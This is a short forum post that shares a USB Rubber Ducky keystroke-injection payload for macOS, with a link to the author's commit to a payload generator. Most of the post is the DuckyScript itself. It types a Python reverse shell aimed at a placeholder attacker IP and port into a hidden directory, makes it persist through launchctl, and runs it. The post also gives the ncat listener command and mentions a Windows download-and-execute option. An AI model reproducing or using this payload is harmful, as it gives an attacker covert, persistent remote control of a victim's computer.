Hi all,
Here are my first additions to this community (after owning the Duck for two days!)
I've created a pull request for the simple duck payload generator by skysploit if you wish to clone my repository and try these in the simple-ducky environment.
https://github.com/kidovate/simple-ducky/commit/496786541282825b9c2034f06b7a57469434281d
First of all, a new MAC OS X payload based on python (much more reliable!)
REM Mac OSX Rev by Christian Stewart (@kidovate)
GUI SPACE
DELAY 500
STRING terminal
DELAY 400
ENTER
DELAY 1000
STRING cd ~
ENTER
STRING mkdir .maintScripts
ENTER
STRING cd .maintScripts
ENTER
STRING echo "while true; do sleep 5 && python -c 'import socket,subprocess,os;
STRING s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
STRING s.connect((\"attackerip\",attackerport));
STRING os.dup2(s.fileno(),0);
STRING os.dup2(s.fileno(),1);
STRING os.dup2(s.fileno(),2);
STRING p=subprocess.call([\"/bin/sh\",\"-i\"]);'; done" > script.sh
ENTER
STRING chmod +rwx script.sh
ENTER
STRING launchctl submit -l someName -p ~/.maintScripts/script.sh
ENTER
STRING ./script.sh&
ENTER
STRING exit
ENTER
be sure to replace "attackerip" with your IP and "attackerport" with your port.
To receive your shell, run
ncat -vl attackerport
... with your port replacing "attackerport" of course.
I have also added a "download JAR and execute" option to the windows part of skysploit's code.